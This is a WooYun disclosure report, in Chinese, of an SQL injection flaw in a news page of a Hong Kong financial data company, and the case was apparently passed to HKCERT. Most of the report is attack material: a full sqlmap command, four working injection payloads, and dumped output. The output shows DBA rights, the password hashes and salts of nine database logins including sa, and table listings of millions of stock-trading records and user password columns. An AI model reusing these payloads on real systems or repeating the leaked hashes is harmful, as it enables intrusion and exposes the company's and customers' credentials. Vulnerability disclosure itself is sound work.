当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155136

漏洞标题:捷利港信(香港)有限公司某深度数据中心存在SQL注射漏洞(DBA权限+9名系统管理员密码泄露+1000多万股票买卖信息泄露+大量用户密码泄露)(香港地區)

相关厂商:捷利港信(香港)有限公司

漏洞作者: 路人甲

提交时间:2015-11-23 10:11

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-26: 厂商已经确认,细节仅向厂商公开
2015-12-06: 细节向核心白帽子及相关领域专家公开
2015-12-16: 细节向普通白帽子公开
2015-12-26: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

捷利港信(Tele-Trend Konson)成立于1990年,是香港最早的金融服务供应商之一,同时也是香港交易所第一批获得行情数据牌照的金融数据供应商。公司于香港成立二十多年以来,一直秉承专业、创新的发展理念,为证券公司、经纪人、技术分析者、基金经理和投资者提供股票报价的实时分析系统以及先进的技术分析系统。

随着高科技金融产业的进步,公司分别成立捷利港信软件(深圳)有限公司以及捷利港信(香港)有限公司,积极部署新一代行情交易软件和技术分析软件。

公司提供美股、美国期货市场盘后、港股、香港股票期货市场、国际现货外汇实时以及其他主要金融市场的金融资讯服务以及提供行情交易一体化解决方案。可为证券商、基金经理、银行、投资顾问、杠杆式外汇商及私人投资者提供快速、可靠、专业的金融行情交易服务。

作为大中华区最专业的全通道网上交易供应商,公司旗下“港股快车/环球快车”系列产品目前已经被最多的中资港股券商使用,并在全球最先发布了手持终端、PC客户端、网页三平台同步的多市场行情交易系统,业已成为中港两地首屈一指的行情交易服务领跑者。

详细说明:

地址:http://**.**.**.**/News/NewsShow.aspx?NewsId=100034
6833

$ python sqlmap.py -u "http://**.**.**.**/News/NewsShow.aspx?NewsId=100034
6833" -p NewsId --technique=BEQU --random-agent --batch --current-user --is-db
a --users --passwords --count --search -C pass


Database: His_TTGame
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.AfterSettlementForBankup | 10289398 |
Database: His_TTGame
Table: AfterSettlementForBankup
[6 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| AccountId | char |
| RecDate | datetime |
| TotalTodayBuy | float |
| TotalTodaySell | float |
| TotalTodayTrustCount | int |
| TotalTradingFee | float |
+----------------------+----------+

漏洞证明:

<code>---
Parameter: NewsId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: NewsId=1000346833 AND 4311=4311
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: NewsId=1000346833 AND 5862=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5862=5862) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)))
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: NewsId=(SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8577=8577) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113))
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: NewsId=1000346833 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(120)+CHAR(98)+CHAR(113)+CHAR(121)+CHAR(85)+CHAR(116)+CHAR(72)+CHAR(119)+CHAR(85)+CHAR(102)+CHAR(105)+CHAR(104)+CHAR(79)+CHAR(113)+CHAR(109)+CHAR(113)+CHAR(98)+CHAR(76)+CHAR(111)+CHAR(77)+CHAR(115)+CHAR(68)+CHAR(90)+CHAR(119)+CHAR(85)+CHAR(111)+CHAR(89)+CHAR(90)+CHAR(66)+CHAR(85)+CHAR(76)+CHAR(65)+CHAR(74)+CHAR(117)+CHAR(104)+CHAR(69)+CHAR(106)+CHAR(116)+CHAR(77)+CHAR(87)+CHAR(117)+CHAR(102)+CHAR(79)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),NULL,NULL,NULL-- -
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
current user: 'newsadminuser'
current user is DBA: True
database management system users [9]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] news_web_admin1
[*] newsadminuser
[*] newsinfo
[*] sa
[*] tscittuser
[*] tt_tsci_user
[*] TTGameUser
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x0100c5ca8a60c379c666488490e8717a6a24ff093551bcf910d2
header: 0x0100
salt: c5ca8a60
mixedcase: c379c666488490e8717a6a24ff093551bcf910d2
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x0100ccae35c96e607ed9fafaec50725e2dd10c3ea96434ea7537
header: 0x0100
salt: ccae35c9
mixedcase: 6e607ed9fafaec50725e2dd10c3ea96434ea7537
[*] news_web_admin1 [1]:
password hash: 0x01001f43c285f0ec404e6ef33024fd5ad8794713b5ae14649e1b
header: 0x0100
salt: 1f43c285
mixedcase: f0ec404e6ef33024fd5ad8794713b5ae14649e1b
[*] newsadminuser [1]:
password hash: 0x0100b6be7581f55d468fc4f2c2e69ca6195836805ef69448868e
header: 0x0100
salt: b6be7581
mixedcase: f55d468fc4f2c2e69ca6195836805ef69448868e
[*] newsinfo [1]:
password hash: 0x01007bc312ec2f20906965073a86028afd6205c08236aa7be811
header: 0x0100
salt: 7bc312ec
mixedcase: 2f20906965073a86028afd6205c08236aa7be811
[*] sa [1]:
password hash: 0x01009a48551a75fcf2de84d56854e882f55b8a3dff1b78bc5e82
header: 0x0100
salt: 9a48551a
mixedcase: 75fcf2de84d56854e882f55b8a3dff1b78bc5e82
[*] tscittuser [1]:
password hash: 0x010030fb70a384bc1516cb4a5fb1c54ea8e83cd00b6062cac00a
header: 0x0100
salt: 30fb70a3
mixedcase: 84bc1516cb4a5fb1c54ea8e83cd00b6062cac00a
[*] tt_tsci_user [1]:
password hash: 0x0100f7a25a16c8de0529777d0e8d657403f557e31f93be208983
header: 0x0100
salt: f7a25a16
mixedcase: c8de0529777d0e8d657403f557e31f93be208983
[*] TTGameUser [1]:
password hash: 0x01008635c1f3f7699d5a7120cfa9bf633e88bd590786cfc5e8aa
header: 0x0100
salt: 8635c1f3
mixedcase: f7699d5a7120cfa9bf633e88bd590786cfc5e8aa
Database: ReportServerTempDB
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.DBUpgradeHistory | 27 |
+------------------------------------------------------+---------+
Database: SHEX_Game
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.tempWolunState | 215247 |
| dbo.WolunStat | 215247 |
| dbo.AfterSettlementForBankup | 187166 |
| dbo.CountBeforbak_AfterSettlementForBankup | 187165 |
| dbo.TempDayYesterdayMonthProfitLoss | 181710 |
| dbo.sst_UserAccount20130816 | 166592 |
| dbo.sst_useraccount20130731 | 110553 |
| dbo.sst_TodayAccountRank20130719 | 97554 |
| dbo.sst_TodayAccountRank20130719 | 97554 |
| dbo.sst_TodayAccountRankTest | 88419 |
| dbo.WebInterfaceLog | 36035 |
| dbo.tmpProfitLoss | 16980 |
| dbo.Temp_AccountBuyStockByLast | 16676 |
| dbo.AccountTradingAmount_temp | 13357 |
| dbo.tmpTotalTraddingCost | 7790 |
| dbo.sst_dropoutstockbankup | 6604 |
| dbo.sst_dropoutstockbankup | 6604 |
| dbo.AccountHoldStockBankup | 1375 |
| dbo.Temp_userAccountSortData | 1200 |
| dbo.HisTradeDtl | 382 |
| dbo.AccountHoldStock_ShareOutBonus | 309 |
| dbo.HisOrder | 307 |
| dbo.sst_ShareOutBonus | 240 |
| dbo.TestUserinfo | 180 |
| dbo.AccountHoldStockMarketValue | 163 |
| dbo.TempUserAccountNoWeekRank | 86 |
| dbo.AccountHoldStock_His | 63 |
| dbo.AccountHoldStock_His | 63 |
| dbo.CountBeforbak_AccountHoldStock | 63 |
| dbo.CountBeforbak_sst_useraccount | 48 |
| dbo.sst_UserAccount_His | 48 |
| dbo.sst_UserAccount_His | 48 |
| dbo.sst_UserInfo | 48 |
| dbo.UserAccount_view | 48 |
| dbo.view_AccountRankInfo | 48 |
| dbo.CountBeforbak_sst_TodayAccountRank | 47 |
| dbo.sst_TradeStatic | 24 |
| dbo.sst_FutureItem | 20 |
| dbo.view_TopHoldStockByAccountLists | 20 |
| dbo.TempUserAccountReduceFund | 14 |
| dbo.ExchangeAndAccountPurpose_view | 4 |
| dbo.PurposeToXml_view | 4 |
| dbo.sst_AccountPurpose | 4 |
| dbo.sst_Exchangerate | 4 |
| dbo.Roles | 3 |
| dbo.Users | 2 |
| dbo.sst_Cooperator | 1 |
| dbo.sst_Exchange | 1 |
| dbo.sst_Global | 1 |
| dbo.tmpTotalStat | 1 |
+------------------------------------------------------+---------+
Database: TTGame
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.tempWolunState | 215247 |
| dbo.WolunStat | 215247 |
| dbo.AfterSettlementForBankup | 187536 |
| dbo.CountBeforbak_AfterSettlementForBankup | 187536 |
| dbo.TempDayYesterdayMonthProfitLoss | 181710 |
| dbo.sst_UserAccount20130816 | 166592 |
| dbo.sst_useraccount20130731 | 110553 |
| dbo.sst_TodayAccountRank20130719 | 97554 |
| dbo.sst_TodayAccountRank20130719 | 97554 |
| dbo.sst_TodayAccountRankTest | 88419 |
| dbo.WebInterfaceLog | 36035 |
| dbo.tmpProfitLoss | 16980 |
| dbo.Temp_AccountBuyStockByLast | 16676 |
| dbo.AccountTradingAmount_temp | 13357 |
| dbo.tmpTotalTraddingCost | 7790 |
| dbo.sst_dropoutstockbankup | 6604 |
| dbo.sst_dropoutstockbankup | 6604 |
| dbo.HisTradeDtl | 1595 |
| dbo.AccountHoldStockBankup | 1375 |
| dbo.Temp_userAccountSortData | 1200 |
| dbo.HisOrder | 867 |
| dbo.sst_UserInfo | 419 |
| dbo.CountBeforbak_sst_TodayAccountRank | 418 |
| dbo.CountBeforbak_sst_useraccount | 418 |
| dbo.sst_UserAccount_His | 418 |
| dbo.sst_UserAccount_His | 418 |
| dbo.UserAccount_view | 418 |
| dbo.view_AccountRankInfo | 418 |
| dbo.AccountHoldStock_His | 327 |
| dbo.AccountHoldStock_His | 327 |
| dbo.CountBeforbak_AccountHoldStock | 327 |
| dbo.AccountHoldStock_ShareOutBonus | 309 |
| dbo.sst_ShareOutBonus | 240 |
| dbo.TestUserinfo | 180 |
| dbo.AccountHoldStockMarketValue | 163 |
| dbo.TempUserAccountNoWeekRank | 86 |
| dbo.sst_TradeStatic | 46 |
| dbo.UserServerList | 22 |
| dbo.UserServerList | 22 |
| dbo.sst_FutureItem | 20 |
| dbo.view_TopHoldStockByAccountLists | 20 |
| dbo.TempUserAccountReduceFund | 14 |
| dbo.ServerList | 10 |
| dbo.ExchangeAndAccountPurpose_view | 4 |
| dbo.PurposeToXml_view | 4 |
| dbo.sst_AccountPurpose | 4 |
| dbo.sst_Exchangerate | 4 |
| dbo.jyb_loginServer | 3 |
| dbo.Roles | 3 |
| dbo.sst_Cooperator | 2 |
| dbo.UserGroup | 2 |
| dbo.sst_Exchange | 1 |
| dbo.sst_Global | 1 |
| dbo.tmpTotalStat | 1 |
+------------------------------------------------------+---------+
Database: msdb
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.sysjobhistory | 1000 |
| dbo.MSdbms_datatype_mapping | 493 |
| dbo.MSdbms_datatype_mapping | 493 |
| dbo.MSdbms_datatype_mapping | 493 |
| dbo.sysdatatypemappings | 493 |
| dbo.MSdbms_map | 374 |
| dbo.sysjobactivity | 370 |
| dbo.backupfilegroup | 316 |
| dbo.backupfilegroup | 316 |
| dbo.backupmediafamily | 316 |
| dbo.backupmediaset | 316 |
| dbo.backupset | 316 |
| dbo.MSdatatype_mappings | 260 |
| dbo.syspolicy_facet_events | 84 |
| dbo.sysutility_mi_smo_properties_to_collect_internal | 84 |
| dbo.syspolicy_management_facets | 83 |
| dbo.syssessions | 50 |
| dbo.sysutility_ucp_policy_target_conditions_internal | 24 |
| dbo.sysutility_ucp_policy_target_conditions_internal | 24 |
| dbo.syscategories | 21 |
| dbo.sysschedules_localserver_view | 18 |
| dbo.sysschedules_localserver_view | 18 |
| dbo.sysutility_ucp_configuration_internal | 13 |
| dbo.sysutility_ucp_configuration_internal | 13 |
| dbo.sysjobs_view | 12 |
| dbo.sysjobs_view | 12 |
| dbo.syssubsystems | 12 |
| dbo.sysutility_ucp_policy_check_conditions_internal | 12 |
| dbo.sysutility_ucp_policy_check_conditions_internal | 12 |
| dbo.sysjobschedules | 11 |
| dbo.sysjobservers | 11 |
| dbo.sysssispackages | 8 |
| dbo.sysutility_ucp_supported_object_types_internal | 8 |
| dbo.sysmail_configuration | 7 |
| dbo.syscollector_collection_items_internal | 6 |
| dbo.syscollector_collection_items_internal | 6 |
| dbo.syscollector_config_store_internal | 5 |
| dbo.syscollector_config_store_internal | 5 |
| dbo.sysmanagement_shared_server_groups_internal | 5 |
| dbo.sysmanagement_shared_server_groups_internal | 5 |
| dbo.sysutility_mi_smo_objects_to_collect_internal | 5 |
| dbo.syscollector_collection_sets_internal | 4 |
| dbo.syscollector_collection_sets_internal | 4 |
| dbo.syscollector_collector_types_internal | 4 |
| dbo.syscollector_collector_types_internal | 4 |
| dbo.syspolicy_configuration_internal | 4 |
| dbo.syspolicy_configuration_internal | 4 |
| dbo.sysssispackagefolders | 4 |
| dbo.restorefilegroup | 3 |
| dbo.restorefilegroup | 3 |
| dbo.restorehistory | 3 |
| dbo.sysdtscategories | 3 |
| dbo.sysutility_ucp_policy_configuration | 2 |
| dbo.sysalerts | 1 |
| dbo.sysdbmaintplans | 1 |
| dbo.sysmail_account | 1 |
| dbo.sysmail_principalprofile | 1 |
| dbo.sysmail_profileaccount | 1 |
| dbo.sysmail_profileaccount | 1 |
| dbo.sysmail_server | 1 |
| dbo.sysmail_servertype | 1 |
| dbo.sysnotifications | 1 |
| dbo.sysoperators | 1 |
| dbo.sysoriginatingservers_view | 1 |
| dbo.sysoriginatingservers_view | 1 |
| dbo.systargetservers_view | 1 |
| dbo.systargetservers_view | 1 |
| dbo.sysutility_ucp_processing_state_internal | 1 |
| dbo.sysutility_ucp_utility_space_utilization | 1 |
+------------------------------------------------------+---------+
Database: StockData
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.TraderStockcodeLists | 704087 |
| dbo.secStockLists | 492953 |
| dbo.stockShortsaleTrade_bak | 353962 |
| dbo.stockShortsaleTrade_bak | 353962 |
| dbo.stockholderRecords | 180029 |
| dbo.view_StockHolderRecords | 180029 |
| dbo.statSharesHolderStock | 180017 |
| dbo.stockholder | 37099 |
| dbo.ItemSessions | 22605 |
| dbo.Company | 18437 |
| dbo.stuffs | 13923 |
| dbo.StockCode | 11273 |
| dbo.ExchangerTrader | 9038 |
| dbo.view_ExchangerTrader | 9038 |
| dbo.Fundamental | 8925 |
| dbo.Item | 8925 |
| dbo.BrokerCode | 3354 |
| dbo.tbEconomy | 1751 |
| dbo.tbSplit | 1678 |
| dbo.SecuritiesStockCodes | 1514 |
| dbo.view_tbEconomy | 1133 |
| dbo.MaxChangeTraderHoldStock | 42 |
| dbo.tb_CapitalStock | 19 |
| dbo.eIPO | 18 |
| dbo.tb_split | 17 |
| dbo.tb_EPS | 16 |
| dbo.stockType | 9 |
| dbo.StockholderRightsEventClass | 7 |
| dbo.StockholderRightsEventClass | 7 |
| dbo.Exchanger | 2 |
| dbo.warrantIssuer | 2 |
| dbo.news_msg | 1 |
+------------------------------------------------------+---------+
Database: Tsci_tt
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.TT_USCODE | 40943 |
| dbo.TT_Warrant | 17337 |
| dbo.TT_HKSTOCK | 15959 |
| dbo.TT_MarketData_US | 9154 |
| dbo.TT_MarketWarrant | 8757 |
| dbo.TT_JYB_HK_blockstk | 6366 |
| dbo.TT_Block_StockCode_A | 4993 |
| dbo.TT_Block_StockCode_A | 4993 |
| dbo.TT_News_Hot | 4287 |
| dbo.TT_MarketData_HS | 2568 |
| dbo.TT_MarketData_HS | 2568 |
| dbo.TT_Adr_HisData | 2056 |
| dbo.TT_Adr_HisData | 2056 |
| dbo.TT_StockCode | 1529 |
| dbo.TT_MarketCash | 1524 |
| dbo.TT_IGP | 1482 |
| dbo.V_StkCash | 1290 |
| dbo.V_STKDATA | 1274 |
| dbo.TT_Block_USCode | 793 |
| dbo.V_STKUS | 793 |
| dbo.TT_Short_Selling | 463 |
| dbo.TT_TurnoverInfo | 335 |
| dbo.TT_JYB_HK_blocklayer | 189 |
| dbo.TT_JYB_HK_blocklayer | 189 |
| dbo.TT_Block_A | 117 |
| dbo.TT_Block_A | 117 |
| dbo.ML_msg_list | 69 |
| dbo.TT_INDEX | 14 |
| dbo.TT_Make_Htm | 8 |
| dbo.TT_His_Data | 5 |
| dbo.TT_Admin | 1 |
+------------------------------------------------------+---------+
Database: ReportServer
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.DBUpgradeHistory | 31 |
| dbo.ConfigurationInfo | 23 |
| dbo.Roles | 8 |
| dbo.PolicyUserRole | 4 |
| dbo.Users | 3 |
| dbo.Keys | 2 |
| dbo.Policies | 2 |
| dbo.SecData | 2 |
| dbo.ServerUpgradeHistory | 2 |
| dbo.Catalog | 1 |
| dbo.UpgradeInfo | 1 |
+------------------------------------------------------+---------+
Database: master
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| sys.dm_os_buffer_descriptors | 453448 |
| sys.messages | 98318 |
| sys.sysmessages | 98318 |
| sys.dm_os_memory_objects | 31338 |
| sys.fulltext_system_stopwords | 15829 |
| sys.syscolumns | 12581 |
| sys.dm_os_ring_buffers | 10323 |
| sys.dm_os_memory_cache_entries | 9767 |
| sys.syscacheobjects | 7400 |
| sys.all_parameters | 7090 |
| sys.system_parameters | 7090 |
| sys.dm_os_virtual_address_dump | 7067 |
| sys.dm_exec_cached_plans | 6992 |
| sys.trace_subclass_values | 5366 |
| sys.all_columns | 5285 |
| sys.system_columns | 4626 |
| sys.trace_event_bindings | 4304 |
| sys.dm_exec_query_stats | 4171 |
| sys.syscomments | 2997 |
| sys.dm_xe_object_columns | 2674 |
| dbo.spt_values | 2508 |
| sys.all_objects | 2002 |
| sys.sysobjects | 2002 |
| sys.system_objects | 1928 |
| sys.database_permissions | 1853 |
| sys.syspermissions | 1852 |
| sys.sysprotects | 1848 |
| sys.dm_os_sublatches | 1824 |
| sys.all_sql_modules | 1785 |
| sys.system_sql_modules | 1783 |
| sys.dm_xe_map_values | 1733 |
| sys.dm_os_performance_counters | 1341 |
| sys.sysperfinfo | 1341 |
| sys.dm_os_threads | 973 |
| sys.dm_os_worker_local_storage | 966 |
| sys.dm_os_workers | 966 |
| sys.system_internals_partition_columns | 822 |
| sys.columns | 659 |
| sys.dm_xe_objects | 542 |
| sys.dm_os_wait_stats | 490 |
| sys.dm_audit_actions | 454 |
| sys.sysprocesses | 429 |
| sys.dm_db_index_usage_stats | 422 |
| sys.dm_os_memory_cache_clock_hands | 400 |
| sys.dm_db_task_space_usage | 394 |
| sys.spatial_reference_systems | 390 |
| sys.dm_exec_query_transformation_stats | 377 |
| sys.event_notification_event_types | 365 |
| sys.stats_columns | 362 |
| sys.stats_columns | 362 |
| sys.all_views | 354 |
| sys.system_views | 354 |
| sys.dm_os_memory_clerks | 321 |
| sys.syslockinfo | 317 |
| sys.dm_tran_locks | 311 |
| sys.dm_exec_connections | 309 |
| sys.dm_exec_sessions | 300 |
| sys.dm_db_session_space_usage | 299 |
| sys.index_columns | 271 |
| sys.sysindexkeys | 271 |
| sys.trigger_event_types | 245 |
| sys.sysindexes | 210 |
| sys.trace_events | 180 |
| sys.dm_os_spinlock_stats | 175 |
| sys.dm_os_memory_cache_counters | 161 |
| sys.dm_os_latch_stats | 144 |
| sys.allocation_units | 128 |
| sys.system_internals_allocation_units | 128 |
| sys.dm_db_partition_stats | 116 |
| sys.indexes | 116 |
| sys.partitions | 116 |
| sys.system_internals_partitions | 116 |
| sys.syscharsets | 114 |
| sys.dm_os_tasks | 113 |
| sys.xml_schema_facets | 112 |
| sys.xml_schema_components | 99 |
| sys.system_components_surface_area_configuration | 95 |
| sys.dm_os_loaded_modules | 88 |
| sys.dm_audit_class_type_map | 83 |
| sys.xml_schema_types | 82 |
| sys.dm_os_memory_pools | 81 |
| sys.objects | 74 |
| sys.configurations | 68 |
| sys.sysconfigures | 68 |
| sys.syscurconfigs | 68 |
| sys.trace_columns | 66 |
| sys.dm_os_memory_cache_hash_tables | 62 |
| INFORMATION_SCHEMA.COLUMNS | 50 |
| sys.fulltext_document_types | 50 |
| sys.fulltext_languages | 48 |
| sys.dm_exec_query_optimizer_info | 39 |
| sys.dm_exec_procedure_stats | 37 |
| sys.dm_os_schedulers | 36 |
| sys.systypes | 34 |
| sys.types | 34 |
| sys.syslanguages | 33 |
| sys.dm_db_missing_index_details | 31 |
| sys.dm_db_missing_index_group_stats | 31 |
| sys.dm_db_missing_index_groups | 31 |
| sys.sysaltfiles | 30 |
| sys.server_permissions | 29 |
| sys.master_files | 28 |
| sys.server_principals | 28 |
| sys.dm_exec_requests | 25 |
| sys.dm_os_memory_node_access_stats | 24 |
| sys.securable_classes | 22 |
| sys.trace_categories | 21 |
| sys.syslogins | 19 |
| sys.database_principals | 18 |
| sys.sysusers | 18 |
| sys.xml_schema_component_placements | 18 |
| sys.dm_os_stacks | 16 |
| INFORMATION_SCHEMA.SCHEMATA | 15 |
| sys.dm_os_waiting_tasks | 15 |
| sys.schemas | 15 |
| sys.xml_schema_attributes | 15 |
| sys.database_recovery_status | 14 |
| sys.databases | 14 |
| sys.service_message_types | 14 |
| sys.sysdatabases | 14 |
| sys.dm_db_script_level | 13 |
| sys.server_role_members | 11 |
| sys.service_contract_message_usages | 11 |
| sys.dm_tran_database_transactions | 10 |
| sys.dm_xe_session_event_actions | 10 |
| sys.server_event_session_actions | 10 |
| sys.sql_logins | 9 |
| sys.crypt_properties | 8 |
| sys.dm_tran_active_transactions | 8 |
| sys.certificates | 7 |
| INFORMATION_SCHEMA.TABLES | 6 |
| sys.linked_logins | 6 |
| sys.service_contracts | 6 |
| sys.sysoledbusers | 6 |
| sys.tables | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| sys.dm_xe_session_events | 5 |
| sys.endpoints | 5 |
| sys.server_event_session_events | 5 |
| sys.servers | 5 |
| sys.sysservers | 5 |
| sys.dm_os_hosts | 4 |
| sys.dm_xe_packages | 4 |
| sys.internal_tables | 4 |
| dbo.MSreplication_options | 3 |
| sys.assembly_types | 3 |
| sys.dm_broker_queue_monitors | 3 |
| sys.dm_clr_properties | 3 |
| sys.dm_os_memory_brokers | 3 |
| sys.dm_os_memory_nodes | 3 |
| sys.dm_os_nodes | 3 |
| sys.dm_xe_session_object_columns | 3 |
| sys.identity_columns | 3 |
| sys.login_token | 3 |
| sys.service_queue_usages | 3 |
| sys.service_queues | 3 |
| sys.services | 3 |
| sys.type_assembly_usages | 3 |
| sys.xml_schema_namespaces | 3 |
| INFORMATION_SCHEMA.ROUTINES | 2 |
| sys.database_files | 2 |
| sys.database_role_members | 2 |
| sys.dm_exec_query_memory_grants | 2 |
| sys.dm_exec_query_resource_semaphores | 2 |
| sys.dm_fts_memory_pools | 2 |
| sys.key_encryptions | 2 |
| sys.procedures | 2 |
| sys.resource_governor_resource_pools | 2 |
| sys.resource_governor_workload_groups | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_modules | 2 |
| sys.sysfiles | 2 |
| sys.sysmembers | 2 |
| sys.tcp_endpoints | 2 |
| dbo.spt_monitor | 1 |
| sys.assemblies | 1 |
| sys.assembly_files | 1 |
| sys.credentials | 1 |
| sys.data_spaces | 1 |
| sys.default_constraints | 1 |
| sys.dm_db_file_space_usage | 1 |
| sys.dm_exec_background_job_queue_stats | 1 |
| sys.dm_exec_background_job_queue_stats | 1 |
| sys.dm_fts_fdhosts | 1 |
| sys.dm_os_dispatcher_pools | 1 |
| sys.dm_os_dispatchers | 1 |
| sys.dm_os_process_memory | 1 |
| sys.dm_os_sys_info | 1 |
| sys.dm_os_sys_memory | 1 |
| sys.dm_resource_governor_configuration | 1 |
| sys.dm_resource_governor_resource_pools | 1 |
| sys.dm_resource_governor_workload_groups | 1 |
| sys.dm_tran_current_transaction | 1 |
| sys.dm_xe_session_targets | 1 |
| sys.dm_xe_sessions | 1 |
| sys.filegroups | 1 |
| sys.resource_governor_configuration | 1 |
| sys.routes | 1 |
| sys.server_event_session_fields | 1 |
| sys.server_event_session_targets | 1 |
| sys.server_event_sessions | 1 |
| sys.symmetric_keys | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.traces | 1 |
| sys.user_token | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+------------------------------------------------------+---------+
Database: News
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.ObjectRelation | 1496029 |
| dbo.NS_MessageKinds_bak201508 | 1168587 |
| dbo.NS_MessageKinds_bak201508 | 1168587 |
| dbo.NS_MessageBak20151117 | 442878 |
| dbo.NS_Announcement | 328899 |
| dbo.Channel_Message | 296181 |
| dbo.View_KindNews | 188442 |
| dbo.NS_US_news | 139042 |
| dbo.NS_PickMessageHistory | 134065 |
| dbo.NS_MessageKinds_bakJanyo | 105599 |
| dbo.NS_MessageKinds20130523 | 94807 |
| dbo.Query | 87429 |
| dbo.UserSubscribeChannel | 57196 |
| dbo.TMP_PickMessage | 43717 |
| dbo.tmpall | 23181 |
| dbo.TT_News_Hot | 11740 |
| dbo.NS_RecordLog | 6164 |
| dbo.view_NewsLists | 3500 |
| dbo.TT_User_bak | 2457 |
| dbo.TT_User_bak | 2457 |
| dbo.stockcode | 2022 |
| dbo.HotNewstag | 2014 |
| dbo.tempNS_PickMessage | 1921 |
| dbo.TT_CustomSTK | 1835 |
| dbo.NS_NewsSendMsg | 1629 |
| dbo.News_Comments | 1405 |
| dbo.FocusNews | 1385 |
| dbo.TT_HKNotice_bak | 1000 |
| dbo.TT_HKNotice_bak | 1000 |
| dbo.view_EveryDayEditCountByUser | 641 |
| dbo.view_jyb_news_comments | 379 |
| dbo.TT_BBS | 298 |
| dbo.TT_User_Do | 245 |
| dbo.GeneralWords | 239 |
| dbo.CommonChannel | 206 |
| dbo.view_jyb_hotNews | 48 |
| dbo.NS_NewsPageSettings | 37 |
| dbo.tmpaaaaa | 22 |
| dbo.V_PageSetings | 22 |
| dbo.NS_Admin | 19 |
| dbo.Company | 15 |
| dbo.NS_subKinds | 15 |
| dbo.View_IM_CompanyLists | 12 |
| dbo.LSB | 11 |
| dbo.NS_NewsMoveStat | 8 |
| dbo.tempExceptHot | 7 |
| dbo.D99_REG | 1 |
| dbo.NS_UserGetEditPickNews | 1 |
+------------------------------------------------------+---------+
Database: His_TTGame
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.AfterSettlementForBankup | 10289398 |
| dbo.sst_useraccountBankup | 4277643 |
| dbo.sst_HistoryAccountRank | 4095310 |
| dbo.HisTradeDtlbankup | 1646092 |
| dbo.HisOrderbankup | 717698 |
| dbo.AccountHoldStockBankup | 8387 |
+------------------------------------------------------+---------+
Database: newstmpmessage
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.tmp_pickmessage | 33520 |
+------------------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: ReportServerTempDB
Table: TempDataSources
[1 column]
+----------+-------+
| Column | Type |
+----------+-------+
| Password | image |
+----------+-------+
Database: SHEX_Game
Table: sst_admin
[1 column]
+---------+---------+
| Column | Type |
+---------+---------+
| logpass | varchar |
+---------+---------+
Database: SHEX_Game
Table: sst_UserInfo
[2 columns]
+-----------------+------+
| Column | Type |
+-----------------+------+
| LoginPassword | char |
| TradingPassword | char |
+-----------------+------+
Database: TTGame
Table: sst_admin
[1 column]
+---------+---------+
| Column | Type |
+---------+---------+
| logpass | varchar |
+---------+---------+
Database: TTGame
Table: sst_UserInfo
[2 columns]
+-----------------+------+
| Column | Type |
+-----------------+------+
| LoginPassword | char |
| TradingPassword | char |
+-----------------+------+
Database: msdb
Table: backupset
[1 column]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| is_password_protected | bit |
+-----------------------+------+
Database: msdb
Table: backupmediaset
[1 column]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| is_password_protected | bit |
+-----------------------+------+
Database: Tsci_tt
Table: TT_Admin
[1 column]
+----------+---------+
| Column | Type |
+----------+---------+
| UserPass | varchar |
+----------+---------+
Database: ReportServer
Table: ExtendedDataSources
[1 column]
+----------+-------+
| Column | Type |
+----------+-------+
| Password | image |
+----------+-------+
